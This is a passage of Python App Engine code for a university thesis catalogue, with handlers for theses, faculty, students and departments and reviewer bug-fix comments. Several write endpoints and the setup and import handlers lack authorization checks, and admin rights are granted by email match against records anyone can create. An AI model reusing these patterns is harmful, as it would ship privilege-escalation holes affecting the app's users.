                    'university_id': university.key.id(),
                })
            advisers = []
            for fac in Faculty.query(Faculty.key == thesis.thesis_adviser):
                advisers.append({
                    'name': fac.faculty_full,
                    'faculty_id': fac.key.id(),
                })
            thesis_list.append({
                'id': thesis.key.id(),
                'year': thesis.thesis_year,
                'title': thesis.thesis_title,
                'abstract': thesis.thesis_abstract,
                'adviser': advisers,
                'section': thesis.thesis_section,
                'department': departments,
                'thesis_id': thesis.key.id(),
            })
        # BUG FIX: was 'application.json' (invalid MIME type).
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({
            'result': 'OK',
            'thesis_data': thesis_list,
        }))

    def post(self):
        """Create a thesis entry from the form fields and echo it as JSON.

        Fixes: unknown proponent names were appended as ``None``, which a
        repeated KeyProperty rejects on put(); the response's 'author' field
        concatenated a User entity with a string (TypeError); removed unused
        ``user``/``faculty`` locals.
        """
        loggedin_user = users.get_current_user()
        user_key = ndb.Key('User', loggedin_user.user_id())
        # Collect proponent keys from thesis_proponent_0, _1, ... until a
        # missing/empty field.  Names are looked up first among students,
        # then among faculty.
        thesis_proponents = []
        i = 0
        while True:
            name = self.request.get('thesis_proponent_' + str(i))
            if not name:
                break
            match = Student.query(Student.student_full == name).get()
            if match is None:
                match = Faculty.query(Faculty.faculty_full == name).get()
            if match is not None:
                thesis_proponents.append(match.key)
            else:
                # BUG FIX: previously appended None, making thesis.put() fail.
                logging.warning('unknown proponent, skipped: %s', name)
            i += 1
        logging.info(thesis_proponents)
        thesis_adviser = Faculty.query(
            Faculty.faculty_full == self.request.get('thesis_adviser')).get()
        thesis_department = Department.query(
            Department.department_name == self.request.get('thesis_department')).get()
        # NOTE(review): assumes adviser/department names exist; a miss raises
        # AttributeError below -- confirm inputs are validated client-side.
        thesis = thesisentry()
        thesis.thesis_author = user_key
        thesis.thesis_year = self.request.get('thesis_year')
        thesis.thesis_title = self.request.get('thesis_title')
        thesis.thesis_abstract = self.request.get('thesis_abstract')
        thesis.thesis_adviser = ndb.Key('Faculty', thesis_adviser.key.id())
        thesis.thesis_section = self.request.get('thesis_section')
        thesis.thesis_proponent = thesis_proponents
        thesis.thesis_department = ndb.Key('Department', thesis_department.key.id())
        # Index the deduplicated 3+-character title words as search tags.
        tags = []
        for word in thesis.thesis_title.split():
            if len(word) >= 3 and word not in tags:
                tags.append(word)
        thesis.thesis_tags = tags
        thesis.put()
        author = user_key.get()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result': 'OK',
            'data': {
                'id': thesis.key.urlsafe(),
                'year': thesis.thesis_year,
                'title': thesis.thesis_title,
                'abstract': thesis.thesis_abstract,
                'section': thesis.thesis_section,
                # BUG FIX: was `user_key.get() + ' ' + user_key.get().last_name`.
                'author': author.first_name + ' ' + author.last_name,
            },
        }
        self.response.out.write(json.dumps(response))
class LoginHandler(webapp2.RequestHandler):
    def get(self):
        """Post-login landing: registered users go home, unknown accounts go
        to registration, anonymous visitors are sent back to sign in.

        Fix: an anonymous request previously fell through and returned an
        empty 200 page; it now redirects into the login flow.
        """
        user = users.get_current_user()
        if not user:
            self.redirect(users.create_login_url('/login'))
            return
        user_info = ndb.Key('User', user.user_id()).get()
        if user_info:
            self.redirect('/home')
        else:
            self.redirect('/register')
class RegistrationHandler(webapp2.RequestHandler):
    def get(self):
        """Show the registration form, auto-registering faculty as admins.

        A signed-in Google account whose email matches a Faculty record is
        registered as an admin User on the spot and sent home.

        Fix: added a ``return`` after the auto-registration redirect --
        ``redirect()`` does not stop execution, so the handler previously
        fell through and issued a second redirect.
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            self.redirect(users.create_login_url('/register'))
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        check = Faculty.query(Faculty.faculty_email == loggedin_user.email()).get()
        logging.info(check)
        if check is not None:
            user = User(is_admin=True,
                        first_name=check.faculty_fname,
                        last_name=check.faculty_sname,
                        email=check.faculty_email,
                        id=loggedin_user.user_id())
            user.put()
            self.redirect('/home')
            return
        if user:
            self.redirect('/home')
        else:
            template_data = {
                'email': loggedin_user.email(),
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/register.html')
            self.response.write(template.render(template_data))

    def post(self):
        """Create a non-admin User keyed by the Google user_id and echo it."""
        user = User(id=users.get_current_user().user_id())
        # NOTE(review): raises ValueError on a non-numeric phone number --
        # confirm the form validates this client-side.
        user.phone_number = int(self.request.get('phone_number'))
        user.email = self.request.get('email')
        user.first_name = self.request.get('first_name')
        user.last_name = self.request.get('last_name')
        user.is_admin = False
        user.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result': 'OK',
            'data': {
                'first_name': user.first_name,
                'last_name': user.last_name,
                'phone_number': user.phone_number,
                'id': users.get_current_user().user_id(),
            },
        }
        self.response.out.write(json.dumps(response))
class ThesisPageHandler(webapp2.RequestHandler):
    def get(self):
        """Render the thesis page (admins only; others go to /home).

        Fixes: removed the unused ``link_text`` local; flattened the
        nested conditionals into guard clauses.
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/home')
            return
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        template_values = {
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/thesis.html')
        self.response.write(template.render(template_values))
class FacultyHandler(webapp2.RequestHandler):
    def get(self):
        """Render the faculty page (admins only; others go to /home).

        Fixes: removed the unused ``link_text`` local; guard clauses.
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/home')
            return
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        # NOTE: unlike the other pages, this one does not pass 'search_url'.
        template_values = {
            'links': links,
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/faculty.html')
        self.response.write(template.render(template_values))

    def post(self):
        """Create a Faculty entity keyed by the normalized full name and
        echo the stored fields back as JSON."""
        department = Department.query(
            Department.department_name == self.request.get('faculty_department')).get()
        # NOTE(review): assumes the department name exists; a miss raises
        # AttributeError on .key below.
        faculty = Faculty()
        faculty.faculty_title = self.request.get('faculty_title')
        faculty.faculty_fname = self.request.get('faculty_fname')
        faculty.faculty_sname = self.request.get('faculty_sname')
        faculty.faculty_full = faculty.faculty_fname + ' ' + faculty.faculty_sname
        faculty.faculty_email = self.request.get('faculty_email')
        faculty.faculty_phone = self.request.get('faculty_phone')
        faculty.faculty_department = ndb.Key('Department', department.key.id())
        faculty.faculty_bday = self.request.get('faculty_bday')
        # Key id: full name lowercased with spaces and punctuation removed.
        faculty.key = ndb.Key(Faculty, faculty.faculty_full.strip().replace(' ', '').replace('.', '').replace(',', '').lower())
        faculty.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result': 'OK',
            'data': {
                'title': faculty.faculty_title,
                'first_name': faculty.faculty_fname,
                'last_name': faculty.faculty_sname,
                'full_name': faculty.faculty_full,
                'email': faculty.faculty_email,
                'phone': faculty.faculty_phone,
                'bday': faculty.faculty_bday,
            },
        }
        self.response.out.write(json.dumps(response))
class StudentHandler(webapp2.RequestHandler):
    def get(self):
        """Render the student page (admins only; others go to /home).

        Fixes: an anonymous request previously returned a blank 200 page
        (there was no branch for it); it now renders the login page, matching
        the other handlers.  Removed the unused ``link_text`` local.
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/home')
            return
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        template_values = {
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/student.html')
        self.response.write(template.render(template_values))

    def post(self):
        """Create a Student entity keyed by the normalized full name and
        echo the stored fields back as JSON."""
        department = Department.query(
            Department.department_name == self.request.get('student_department')).get()
        # NOTE(review): assumes the department name exists; a miss raises
        # AttributeError on .key below.
        student = Student()
        student.student_fname = self.request.get('student_fname')
        student.student_sname = self.request.get('student_sname')
        student.student_full = student.student_fname + ' ' + student.student_sname
        student.student_phone = self.request.get('student_phone')
        student.student_email = self.request.get('student_email')
        student.student_number = self.request.get('student_number')
        student.student_graduated = int(self.request.get('student_graduated'))
        student.student_department = ndb.Key('Department', department.key.id())
        student.student_bday = self.request.get('student_bday')
        # Deduplicated words of the full name (2+ chars) for name search.
        portions = []
        for word in student.student_full.split():
            if len(word) > 1 and word not in portions:
                portions.append(word)
        student.student_name_portions = portions
        # Key id: full name lowercased with spaces and punctuation removed.
        student.key = ndb.Key(Student, student.student_full.strip().replace(' ', '').replace('.', '').replace(',', '').lower())
        student.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result': 'OK',
            'data': {
                'first_name': student.student_fname,
                'last_name': student.student_sname,
                'full_name': student.student_full,
                'phone': student.student_phone,
                'email': student.student_email,
                'student_number': student.student_number,
                'year_graduated': student.student_graduated,
            },
        }
        self.response.out.write(json.dumps(response))
class UniversityHandler(webapp2.RequestHandler):
    def get(self):
        """Render the university page (admins only; others go to /home).

        Fixes: anonymous requests previously got a blank 200 page; now they
        see the login page like the other handlers.  Removed unused
        ``link_text``; guard clauses.
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/home')
            return
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        template_values = {
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/university.html')
        self.response.write(template.render(template_values))

    def post(self):
        """Create a University keyed by its lowercased initialism, echo JSON."""
        university = University()
        university.university_name = self.request.get('university_name')
        university.university_initial = self.request.get('university_initial')
        university.university_address = self.request.get('university_address')
        university.key = ndb.Key(University, university.university_initial.strip().replace(' ', '').replace('.', '').replace(',', '').lower())
        university.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result': 'OK',
            'data': {
                'university_name': university.university_name,
                'university_initial': university.university_initial,
                'university_address': university.university_address,
            },
        }
        self.response.out.write(json.dumps(response))
class CollegeHandler(webapp2.RequestHandler):
    def get(self):
        """Render the college page (admins only; non-admins go to '/').

        Fixes: anonymous requests previously got a blank 200 page; now they
        see the login page.  Removed unused ``link_text``; guard clauses.
        The original non-admin redirect target '/' is preserved.
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/')
            return
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        template_values = {
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/college.html')
        self.response.write(template.render(template_values))

    def post(self):
        """Create a College linked to its university, keyed by its name."""
        university = University.query(
            University.university_name == self.request.get('college_university')).get()
        # NOTE(review): assumes the university name exists; a miss raises
        # AttributeError on .key below.
        college = College()
        college.college_university = ndb.Key('University', university.key.id())
        college.college_name = self.request.get('college_name')
        college.key = ndb.Key(College, college.college_name.strip().replace(' ', '').replace('.', '').replace(',', '').lower())
        college.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result': 'OK',
            'data': {
                'college_name': college.college_name,
            },
        }
        self.response.out.write(json.dumps(response))
class DepartmentHandler(webapp2.RequestHandler):
    def get(self):
        """Render the department page (admins only; non-admins go to '/').

        Fixes: anonymous requests previously got a blank 200 page; now they
        see the login page.  Removed unused ``link_text``; guard clauses.
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/')
            return
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        template_values = {
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/department.html')
        self.response.write(template.render(template_values))

    def post(self):
        """Create a Department, register it on its College's cached
        department-key list, and echo the name back as JSON."""
        college_match = College.query(
            College.college_name == self.request.get('department_college')).get()
        chair = Faculty.query(
            Faculty.faculty_full == self.request.get('department_chair')).get()
        # NOTE(review): assumes college and chair names exist; a miss raises
        # AttributeError on .key below.
        department = Department()
        department.department_college = ndb.Key('College', college_match.key.id())
        department.department_name = self.request.get('department_name')
        department.department_chair = ndb.Key('Faculty', chair.key.id())
        department.key = ndb.Key(Department, department.department_name.strip().replace(' ', '').replace('.', '').replace(',', '').lower())
        department.put()
        # Keep the college's cached list of department keys in sync.
        college = College.query(College.key == department.department_college).get()
        logging.info(college)
        department_keys = college.college_departments
        logging.info(department_keys)
        department_keys.append(department.key)
        college.college_departments = department_keys
        college.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result': 'OK',
            'data': {
                'department_name': department.department_name,
            },
        }
        self.response.out.write(json.dumps(response))
class DataImportHandler(webapp2.RequestHandler):
    def get(self):
        """Bulk-import thesis rows from data/data.csv next to this module.

        Column layout (0-based): f[2]=department, f[3]=year, f[4]=title,
        f[5]=abstract, f[6]=section, f[7]=adviser, f[8..11]=proponents.
        Missing advisers/departments/students are created on the fly.

        Fixes: ``len(f[i]) is not 0`` compared object identity with a
        literal instead of value (works only by CPython small-int caching);
        the file handle leaked if a row failed -- now a ``with`` block;
        removed the unused ``adviser_name`` local.
        """
        script_dir = os.path.split(os.path.abspath(__file__))[0]
        abs_file_path = os.path.join(script_dir, "data/data.csv")
        imported = 0
        with open(abs_file_path) as csvfile:
            for f in csv.reader(csvfile):
                thesis = thesisentry()
                thesis.thesis_year = f[3]
                thesis.thesis_title = f[4]
                thesis.thesis_abstract = f[5]
                thesis.thesis_section = f[6]
                if len(f[7]) == 0:
                    f[7] = 'is_empty'  # placeholder key for a blank adviser cell
                adviser_keyname = f[7].strip().replace(' ', '').replace('.', '').replace(',', '').lower()
                thesis_adviser = Faculty.get_by_keyname(adviser_keyname)
                if thesis_adviser is None:
                    thesis_adviser = Faculty(key=ndb.Key(Faculty, adviser_keyname),
                                             faculty_full=f[7])
                    thesis_adviser.put()
                thesis.thesis_adviser = thesis_adviser.key
                department_name = f[2]
                thesis_department = Department.get_by_name(department_name)
                if thesis_department is None:
                    thesis_department = Department(
                        key=ndb.Key(Department, department_name.strip().replace(' ', '').replace('.', '').replace(',', '').lower()),
                        department_name=department_name)
                    thesis_department.put()
                thesis.thesis_department = thesis_department.key
                # BUG FIX: was `if len(f[i]) is not 0` (identity comparison).
                proponents = [f[i] for i in range(8, 12) if f[i]]
                proponent_list = []
                for p in proponents:
                    thesis_proponent = Student.get_by_name(p)
                    if thesis_proponent is None:
                        portions = []
                        for s in p.split():
                            if len(s) > 1 and s not in portions:
                                portions.append(s.lower())
                        thesis_proponent = Student(
                            key=ndb.Key(Student, p.strip().replace(' ', '').replace('.', '').replace(',', '').lower()),
                            student_full=p,
                            student_name_portions=portions)
                        thesis_proponent.put()
                    proponent_list.append(thesis_proponent.key)
                thesis.thesis_proponent = proponent_list
                # Index the deduplicated 3+-character title words as tags.
                tags = []
                for t in thesis.thesis_title.split():
                    if len(t) >= 3 and t not in tags:
                        tags.append(t.lower())
                thesis.thesis_tags = tags
                thesis.put()
                imported += 1
                logging.info(imported)
class SetupHandler(webapp2.RequestHandler):
    def get(self):
        """One-off bootstrap: seed PUP / Engineering / COE plus two faculty
        records, then wire the chair and department references together."""

        def keyname(text):
            # Key ids are names lowercased with spaces/periods/commas removed.
            return text.strip().replace(' ', '').replace('.', '').replace(',', '').lower()

        chair_fname = 'Pedrito '
        chair_sname = 'Tenerife, Jr.'
        chair_title = 'Engr. '
        chairperson = Faculty(key=ndb.Key(Faculty, keyname(chair_fname + chair_sname)),
                              faculty_fname=chair_fname,
                              faculty_sname=chair_sname,
                              faculty_title=chair_title,
                              faculty_full=chair_title + chair_fname + chair_sname,
                              faculty_email='jp.resuello07@gmail.com')
        chairperson.put()
        logging.info(chairperson.key.id())

        prof_fname = 'Roman Angelo '
        prof_sname = 'Tria'
        prof_title = 'Engr. '
        dbmsprof = Faculty(key=ndb.Key(Faculty, keyname(prof_fname + prof_sname)),
                           faculty_fname=prof_fname,
                           faculty_sname=prof_sname,
                           faculty_title=prof_title,
                           faculty_full=prof_title + prof_fname + prof_sname,
                           faculty_email='gino.tr14@gmail.com')
        dbmsprof.put()
        logging.info(dbmsprof.key.id())

        university = University(key=ndb.Key(University, 'pup'),
                                university_name='Polytechnic University of the Philippines',
                                university_address='Sta. Mesa, Manila',
                                university_initial='PUP')
        university.put()
        college = College(key=ndb.Key(College, 'engineering'),
                          college_name='Engineering',
                          college_university=university.key)
        college.put()
        department = Department(key=ndb.Key(Department, 'coe'),
                                department_name='COE',
                                department_college=college.key,
                                department_chair=chairperson.key)
        department.put()
        college.college_departments = [department.key]
        college.put()
        chairperson.faculty_department = department.key
        dbmsprof.faculty_department = department.key
        chairperson.put()
        dbmsprof.put()
        self.redirect('/')
class FacultyListHandler(webapp2.RequestHandler):
    def get(self):
        """Render the faculty list page; admins additionally get the
        "Create Entry" links.

        Fixes: removed the unused ``link_text`` locals and the duplicated
        template-rendering code (both branches rendered the same template
        with the same value keys).
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            self.redirect('/register')
            return
        if user.is_admin:
            links = {
                'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
            }
        else:
            links = {
                'Faculty': {'List': '/faculty/list'},
                'Students': {'List': '/student/list'},
                'Department': {'List': '/department/list'},
                'Universities': {'List': '/university/list'},
                'Colleges': {'List': '/college/list'},
                'Theses': {'List': '/thesis/list/all'},
            }
        template_values = {
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/facultylist.html')
        self.response.write(template.render(template_values))

    def post(self):
        """Create a Faculty entity keyed by the normalized full name and
        echo the stored fields back as JSON (mirrors FacultyHandler.post)."""
        department = Department.query(
            Department.department_name == self.request.get('faculty_department')).get()
        # NOTE(review): assumes the department name exists; a miss raises
        # AttributeError on .key below.
        faculty = Faculty()
        faculty.faculty_title = self.request.get('faculty_title')
        faculty.faculty_fname = self.request.get('faculty_fname')
        faculty.faculty_sname = self.request.get('faculty_sname')
        faculty.faculty_full = faculty.faculty_fname + ' ' + faculty.faculty_sname
        faculty.faculty_email = self.request.get('faculty_email')
        faculty.faculty_phone = self.request.get('faculty_phone')
        faculty.faculty_department = ndb.Key('Department', department.key.id())
        faculty.faculty_bday = self.request.get('faculty_bday')
        faculty.key = ndb.Key(Faculty, faculty.faculty_full.strip().replace(' ', '').replace('.', '').replace(',', '').lower())
        faculty.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result': 'OK',
            'data': {
                'title': faculty.faculty_title,
                'first_name': faculty.faculty_fname,
                'last_name': faculty.faculty_sname,
                'full_name': faculty.faculty_full,
                'email': faculty.faculty_email,
                'phone': faculty.faculty_phone,
                'bday': faculty.faculty_bday,
            },
        }
        self.response.out.write(json.dumps(response))
class FacultyAPIHandler(webapp2.RequestHandler):
    def get(self):
        """Return all faculty records as JSON, oldest first.

        Fix: Content-Type was 'application.json', an invalid MIME type.
        NOTE(review): anonymous or unregistered callers still get an empty
        200 response, as before.
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            return
        faculty = [{
            'id': f.key.id(),
            'title': f.faculty_title,
            'first_name': f.faculty_fname,
            'last_name': f.faculty_sname,
            'full_name': f.faculty_full,
            'email': f.faculty_email,
            'phone': f.faculty_phone,
        } for f in Faculty.query().order(Faculty.created_date).fetch()]
        # BUG FIX: was 'application.json'.
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({
            'result': 'OK',
            'faculty_data': faculty,
        }))
class ThesisCreateAPI(webapp2.RequestHandler):
    def get(self):
        """Return the faculty, student and department lists used to populate
        the thesis-creation form, as one JSON payload.

        Fix: Content-Type was 'application.json', an invalid MIME type.
        NOTE(review): anonymous or unregistered callers still get an empty
        200 response, as before.
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            return
        faculty = [{
            'title': f.faculty_title,
            'first_name': f.faculty_fname,
            'last_name': f.faculty_sname,
            'full_name': f.faculty_full,
            'email': f.faculty_email,
            'phone': f.faculty_phone,
        } for f in Faculty.query().order(Faculty.created_date).fetch()]
        student = [{
            'first_name': s.student_fname,
            'last_name': s.student_sname,
            'full_name': s.student_full,
            'phone': s.student_phone,
            'email': s.student_email,
            'student_number': s.student_number,
            'year_graduated': s.student_graduated,
        } for s in Student.query().order(Student.created_date).fetch()]
        department = []
        for d in Department.query().order(Department.created_date).fetch():
            colleges = [{'name': co.college_name}
                        for co in College.query(College.key == d.department_college)]
            department.append({
                'college': colleges,
                'name': d.department_name,
            })
        # BUG FIX: was 'application.json'.
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({
            'result': 'OK',
            'faculty_data': faculty,
            'student_data': student,
            'department_data': department,
        }))
class StudentsAPIHandler(webapp2.RequestHandler):
    def get(self):
        """Return all student records as JSON, oldest first.

        Fix: Content-Type was 'application.json', an invalid MIME type.
        NOTE(review): anonymous or unregistered callers still get an empty
        200 response, as before.
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            return
        student = [{
            'id': s.key.id(),
            'first_name': s.student_fname,
            'last_name': s.student_sname,
            'full_name': s.student_full,
            'phone': s.student_phone,
            'email': s.student_email,
            'student_number': s.student_number,
            'year_graduated': s.student_graduated,
            'birthday': s.student_bday,
        } for s in Student.query().order(Student.created_date).fetch()]
        # BUG FIX: was 'application.json'.
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({
            'result': 'OK',
            'data': student,
        }))
class StudentListHandler(webapp2.RequestHandler):
    def get(self):
        """Render the student list page; admins additionally get the
        "Create Entry" links.

        Fixes: removed unused ``link_text`` locals; guard clauses.  The
        original per-branch template_values are preserved (the admin branch
        does not pass 'search_url').
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            self.redirect('/register')
            return
        if user.is_admin:
            links = {
                'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
            }
            template_values = {
                'links': links,
                'logout_url': users.create_logout_url('/'),
                'user': user.first_name,
            }
        else:
            links = {
                'Faculty': {'List': '/faculty/list'},
                'Students': {'List': '/student/list'},
                'Department': {'List': '/department/list'},
                'Universities': {'List': '/university/list'},
                'Colleges': {'List': '/college/list'},
                'Theses': {'List': '/thesis/list/all'},
            }
            template_values = {
                'links': links,
                'search_url': '/search',
                'logout_url': users.create_logout_url('/'),
                'user': user.first_name,
            }
        template = JINJA_ENVIRONMENT.get_template('/pages/studentlist.html')
        self.response.write(template.render(template_values))
class UniversityAPIHandler(webapp2.RequestHandler):
    """JSON API: lists all universities, ordered by creation date."""

    def get(self):
        """Write ``{'result': 'OK', 'data': [...]}`` for a registered user.

        Writes no response body when the visitor is anonymous or has no
        User entity (preserved from the original implementation).
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                universitylist = University.query().order(University.created_date).fetch()
                university = [{
                    'id': u.key.id(),
                    'university_name': u.university_name,
                    'university_initial': u.university_initial,
                    'university_address': u.university_address,
                } for u in universitylist]
                response = {
                    'result': 'OK',
                    'data': university,
                }
                # Fix: was 'application.json' (typo) — clients would not
                # recognize the response as JSON.
                self.response.headers['Content-Type'] = 'application/json'
                self.response.out.write(json.dumps(response))
class UniversityListHandler(webapp2.RequestHandler):
    """Renders the university list page, or the login page for anonymous visitors."""

    def get(self):
        current = users.get_current_user()
        if not current:
            # Not signed in at all: offer login and registration.
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', current.user_id()).get()
        if not user:
            # Signed in with Google but no app profile yet.
            self.redirect('/register')
            return
        link_text = 'Logout'
        if user.is_admin:
            nav = {
                'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
            }
        else:
            nav = {
                'Faculty': {'List': '/faculty/list'},
                'Students': {'List': '/student/list'},
                'Universities': {'List': '/university/list'},
                'Colleges': {'List': '/college/list'},
                'Departments': {'List': '/department/list'},
                'Theses': {'List': '/thesis/list/all'},
            }
        template = JINJA_ENVIRONMENT.get_template('/pages/universitylist.html')
